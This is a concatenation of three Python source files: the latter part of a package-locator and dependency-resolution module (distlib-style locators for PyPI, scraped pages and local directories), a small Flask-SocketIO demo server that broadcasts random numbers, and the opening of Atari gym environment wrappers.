url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
return client.list_packages()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None:
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None:
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme != 'https', 'pypi.python.org' in t.netloc,
is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
name1, name2 = name1.lower(), name2.lower()
if name1 == name2:
result = True
else:
# distribute replaces '-' by '_' in project names, so it
# can tell where the version starts in a filename.
result = name1.replace('_', '-') == name2.replace('_', '-')
return result
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='):
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/':
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if is_compatible(wheel, self.wheel_tags):
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e:
logger.warning('invalid path for wheel: %s', path)
elif path.endswith(self.downloadable_extensions):
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t:
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver:
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None:
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception:
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd:
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\s*=\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\s\n]*))\s+)?
href\s*=\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\s\n]*))
(\s+rel\s*=\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|'
r'win(32|-amd64)|macosx-?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError:
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e:
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e:
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path):
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are question-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
|
socket_test.py
|
from flask import Flask, render_template
from flask_socketio import SocketIO, emit
import logging
import random
from time import sleep
import threading
from os import path
app = Flask(__name__, template_folder=path.dirname(__file__))
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app,cors_allowed_origins="*")
@socketio.on('connect')
def test_connect():
logging.info(f'Client connected')
emit('my response', {'data': 'Connected'})
@app.route('/')
def index():
return render_template('socket.html')
@socketio.on('my event')
def test_message(message):
logging.info(f'The received Message is: {message}')
emit('my response', {'data': 'got it!'})
def my_thread(countDown):
for _ in range(countDown):
logging.info('Generating new number...')
num = random.randint(0,100)
socketio.emit('new data', f'The server generated for you the value {num}', broadcast=True)
sleep(1)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format='[%(levelname)s] %(message)s'
)
t = threading.Thread(target=my_thread, args=(100,))
t.start()
socketio.run(app)
|
atari_wrappers.py
|
import gym
import numpy as np
from collections import deque
from PIL import Image
from multiprocessing import Process, Pipe
# atari_wrappers.py
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def _reset(self):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset()
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(0)
if done:
obs = self.env.reset()
return obs
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
